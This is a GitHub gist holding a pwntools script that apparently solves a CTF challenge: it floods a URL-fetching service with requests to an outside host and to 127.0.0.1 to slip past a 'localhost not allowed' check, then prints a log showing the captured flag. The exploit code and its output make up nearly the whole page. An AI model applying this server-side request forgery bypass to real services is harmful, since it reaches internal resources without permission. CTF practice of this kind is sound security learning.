Skip to content
Please note that GitHub no longer supports Internet Explorer.

We recommend upgrading to the latest Microsoft Edge, Google Chrome, or Firefox.

Learn more

Instantly share code, notes, and snippets.

Embed
What would you like to do?
from pwn import *
r = remote("rms-fixed.hackable.software",1337)
def add_url(url):
r.recvuntil('Choice')
r.sendline("a")
r.recvuntil("url?")
r.sendline(url)
def view_request(idx):
r.recvuntil('Choice')
r.sendline("v")
r.recvuntil("request id?")
r.sendline(str(idx))
data = r.recvuntil("What do?")
return data
raw_input("?")
target = "http://google.com:8000/flag"
for i in range(5):
add_url(target)
for i in range(2):
add_url("http://127.0.0.1:8000/flag")
r.interactive()
"""
Choice? [pfvaq] $ f Done: [5] FAIL: localhost not allowed
[6] FAIL: localhost not allowed
[0] OK, HTTP/1.0 200 OK
[1] OK, HTTP/1.0 200 OK
[2] OK, HTTP/1.0 200 OK
[3] OK, HTTP/1.0 200 OK
[4] OK, HTTP/1.0 200 OK
What do?
list [p]ending requests
list [f]inished requests
[v]iew result of request
[a]dd new request
[q]uit
Choice? [pfvaq] $ v request id? $ 0 [0] Response, 121 bytes: HTTP/1.0 200 OK Server: BaseHTTP/0.3 Python/2.7.15+
Date: Sun, 22 Sep 2019 13:57:04 GMT
DrgnS{e9759caf4f2d2b69773c}
What do?
list [p]ending requests
list [f]inished requests
[v]iew result of request
[a]dd new request
[q]uit
Choice? [pfvaq] $
"""
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.